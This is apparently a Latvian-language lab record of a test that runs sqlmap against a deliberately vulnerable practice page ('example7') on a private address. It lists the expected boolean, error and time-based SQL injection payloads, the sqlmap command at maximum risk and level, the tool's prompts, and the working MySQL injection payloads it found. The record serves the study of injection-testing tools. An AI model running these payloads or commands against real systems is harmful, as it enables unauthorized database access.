=================================================================================
1. Īpašība: šajā piemērā tiek izpildīti divi vaicājumi. Pirmais vaicājums atlasa lietotāju pēc tā  id, otrais vaicājums visus lietototājus ar pirmajā vaicājumā atlasītā lietotāja lietotājvārdu. 
2. Nepiciešams tampering: nē
3. Sagaidāmais rezultāts: 
3.1. boolean-based: ?id=0 or username like 'us%25' limit 1
3.2. error-based: ?id=1'
3.3. time-based: ?id=0 or sleep(1)
3.4. union: -
4. Reālais rezultāts: redzams zemāk
5. Vidējais risinājuma ilgums: 152249080 nanosekundes
6. Palaistā komanda
sqlmap -u "http://192.168.17.134/sqlinjection/example7/?id=1" -p id --risk=3 --level=5


7. Jautājumi, kurus uzdeva SQLMap
7.1. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
7.2. do you want to (re)try to find proper UNION column types with fuzzy test? [Y/n] y
7.3.injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
7.4. GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
=================================================================================
sqlmap identified the following injection point(s) with a total of 490 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6132=6132

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 3588 FROM(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(3588=3588,1))),0x717a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
    Payload: id=1 OR SLEEP(5)
---
